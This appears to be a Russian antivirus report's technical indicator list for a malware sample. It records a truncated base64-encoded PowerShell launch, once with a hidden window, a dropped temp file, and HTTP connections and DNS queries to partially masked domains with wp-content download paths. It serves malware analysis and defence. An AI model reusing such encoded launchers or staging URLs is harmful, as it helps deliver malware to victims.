Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAF8ANQAyADIAMwA9ACcAagA1ADgANwAxADkAMQA3ACcAOwAkAGsAMwAxADMAMwA3ADAANAAgAD0AIAAnADQANQAyACcAOwAkAGoAMgAzADEAOAAwAF8APQAnAHMAMQA2ADMANwA3ADEANgAnADsAJABSAF8ANgA4ADkAMgA4AD0AJABlAG4AdgA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\757306.cvr
- 'pr####ebracing.com':80
- 're####sourcing.com':80
- 'st####better.com':80
- http://pr####ebracing.com/wp-content/3w83dfn374/3w83dfn374/
- http://re####sourcing.com/wp-content/fk448/
- http://st####better.com/cgi-bin/9lw4sk37969/
- DNS ASK pr####ebracing.com
- DNS ASK re####sourcing.com
- DNS ASK bu#######.andreea-escort.com
- DNS ASK pr#####wsoverseas.com
- DNS ASK st####better.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAF8ANQAyADIAMwA9ACcAagA1ADgANwAxADkAMQA3ACcAOwAkAGsAMwAxADMAMwA3ADAANAAgAD0AIAAnADQANQAyACcAOwAkAGoAMgAzADEAOAAwAF8APQAnAHMAMQA2ADMANwA3ADEANgAnADsAJABSAF8ANgA4ADkAMgA4AD0AJABlAG4AdgA...' (со скрытым окном)